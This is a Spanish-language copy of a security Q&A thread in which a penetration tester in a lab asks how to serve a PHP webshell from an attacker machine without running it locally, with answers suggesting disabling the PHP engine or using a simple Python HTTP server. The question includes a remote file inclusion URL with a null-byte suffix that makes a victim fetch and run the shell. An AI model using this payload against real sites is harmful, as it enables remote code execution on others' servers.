Sirviendo un webshell php sin ejecutarlo localmente

Question

Sirviendo un webshell php sin ejecutarlo localmente

#1 de Sjoerd (7 votos)
#2 de Sebastian B. (4 votos)

6

Estoy usando Kali Linux en un laboratorio de análisis de pruebas.

Al ingresar la siguiente URL en el sistema de la víctima, puedo acceder a mi servidor apache (veo una respuesta de acceso de 200 en mis registros), pero el archivo php se reproduce en mi sistema y luego engendro un webshell por mi cuenta. caja:

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

¿Cómo puedo "cambiar el enlace" en apache para evitar que se ejecute? Cambiarlo a .txt parece evitar que se ejecute en ambos sistemas; no estoy seguro de que pueda inyectarlo de esa manera .

apache web php shellcode

pregunta Shrout1 23.12.2016 - 21:09

fuente

2 respuestas

7

Use la siguiente configuración en su configuración de apache o en un archivo .htaccess:

php_flag engine off

Ver también Deshabilitar PHP en el directorio (incluidos todos subdirectorios) con .htaccess .

respondido por el Sjoerd 23.12.2016 - 21:57

fuente

Lea otras preguntas en las etiquetas apache web php shellcode

Cuando me registro en un sitio web, ¿hay alguna manera de saber si el administrador del sitio podrá ver mi contraseña o no? [duplicar] Cadena de certificados

score 4 · Accepted Answer

4

python -m SimpleHTTPServer 80

generará un servidor http simple que no es compatible con PHP, de la forma más rápida posible iho

respondido por el Sebastian B. 24.12.2016 - 01:21

fuente